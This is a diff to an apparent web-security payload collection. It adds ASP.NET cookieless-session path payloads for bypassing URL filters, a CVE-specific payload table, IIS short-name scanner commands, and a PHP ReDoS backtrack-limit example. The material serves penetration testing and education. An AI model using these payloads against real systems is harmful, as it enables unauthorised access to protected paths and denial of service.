diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index fc622d1..50c531e 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -14,6 +14,7 @@ * [UNC Bypass](#unc-bypass) * [NGINX/ALB Bypass](#nginxalb-bypass) * [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass) + * [IIS Short Name](#iis-short-name) * [Path Traversal](#path-traversal) * [Interesting Linux files](#interesting-linux-files) * [Interesting Windows files](#interesting-windows-files) @@ -104,18 +105,55 @@ To bypass this behaviour just add forward slashes in front of the url: ```http://nginx-server////////../../``` -### ASPNET Cookieless Bypass +### ASP NET Cookieless Bypass When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it. For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID. + +| .NET Version | URI | +| -------------- | -------------------------- | +| V1.0, V1.1 | /(XXXXXXXX)/ | +| V2.0+ | /(S(XXXXXXXX))/ | +| V2.0+ | /(A(XXXXXXXX)F(YYYYYYYY))/ | +| V2.0+ | ... | + + We can use this behavior to bypass filtered URLs. -```powershell -/admin/(S(X))/main.aspx -/admin/Foobar/(S(X))/../(S(X))/main.aspx -/(S(X))/admin/(S(X))/main.aspx +* If your application is in the main folder + ```ps1 + /(S(X))/ + /(Y(Z))/ + /(G(AAA-BBB)D(CCC=DDD)E(0-1))/ + /(S(X))/admin/(S(X))/main.aspx + /(S(x))/b/(S(x))in/Navigator.dll + ``` + +* If your application is in a subfolder + ```ps1 + /MyApp/(S(X))/ + /admin/(S(X))/main.aspx + /admin/Foobar/(S(X))/../(S(X))/main.aspx + ``` + + +| CVE | Payload | +| -------------- | ---------------------------------------------- | +| CVE-2023-36899 | /WebForm/(S(X))/prot/(S(X))ected/target1.aspx | +| - | /WebForm/(S(X))/b/(S(X))in/target2.aspx | +| CVE-2023-36560 | /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ | +| - | /WebForm/b/(S(X))in/target2.aspx/(S(X))/ | + + +### IIS Short Name + +* [irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) + +```ps1 +java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/' +java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/' ``` @@ -235,4 +273,5 @@ The following log files are controllable and can be included with an evil payloa * [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381) * [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal) * [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072) -* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - 30 nov. 2023](https://youtu.be/YlZGJ28By8U) \ No newline at end of file +* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - 30 nov. 2023](https://youtu.be/YlZGJ28By8U) +* [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - 06/24/2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10)) \ No newline at end of file diff --git a/Regular Expression/README.md b/Regular Expression/README.md index 3a29a8a..b54d973 100644 --- a/Regular Expression/README.md +++ b/Regular Expression/README.md @@ -30,7 +30,36 @@ Evil Regex contains: These regular expressions can be exploited with `aaaaaaaaaaaaaaaaaaaaaaaa!` +### Backtrack Limit + +Backtracking in regular expressions occurs when the regex engine tries to match a pattern and encounters a mismatch. The engine then backtracks to the previous matching position and tries an alternative path to find a match. This process can be repeated many times, especially with complex patterns and large input strings. + +PHP PCRE configuration options + +| Name | Default | Note | +|----------------------|---------|---------| +| pcre.backtrack_limit | 1000000 | 100000 for `PHP < 5.3.7`| +| pcre.recursion_limit | 100000 | / | +| pcre.jit | 1  | / | + + +Sometimes it is possible to force the regex to exceed more than 100 000 recursions which will cause a ReDOS and make `preg_match` returning false: + +```php +$pattern = '/(a+)+$/'; +$subject = str_repeat('a', 1000) . 'b'; + +if (preg_match($pattern, $subject)) { + echo "Match found"; +} else { + echo "No match"; +} +``` + + ## References * [Regular expression Denial of Service - ReDoS - OWASP - Adar Weidman](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) -* [OWASP Validation Regex Repository - OWASP](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository) \ No newline at end of file +* [OWASP Validation Regex Repository - OWASP](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository) +* [PHP Manual > Function Reference > Text Processing > PCRE > Installing/Configuring > Runtime Configuration](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit) +* [Intigriti Challenge 1223 - HACKBOOK OF A HACKER](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223) \ No newline at end of file